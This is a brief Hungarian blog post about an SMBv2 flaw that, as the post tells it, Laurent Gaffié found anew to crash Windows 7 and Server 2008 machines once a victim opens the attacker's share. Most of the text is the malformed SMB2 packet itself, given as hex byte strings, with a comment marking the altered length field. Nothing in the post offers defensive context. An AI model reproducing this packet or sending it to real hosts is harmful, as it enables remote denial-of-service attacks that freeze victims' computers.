Jah.
Volt egy jóképű szeptember környékén felfedezett exploit, amivel távolról meg lehett ölni a sambát futtató gépeket (SMB v.2, asszem Vista,W7, Server2008 ).
Ki is javították ügyesen :)
Aztán jött Ő: Laurent Gaffié
Biztonsági szakértő legény...megtette :)
Sikerül neki ugyanazzal a hibával elhasaltatni a W7, Server2008 rendszereket. Csak most annyi különbséggel, hogy rá kell vennünk a távoli júzert, h megnézze a "win-es megosztásunkat".
Onnantól úgy eldöglik a gépe, h soha többet meg se moccan (csak restart)
A titok:
packet = "\x00\x00\x00\x9a" # --> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
Nincsenek megjegyzések:
Megjegyzés küldése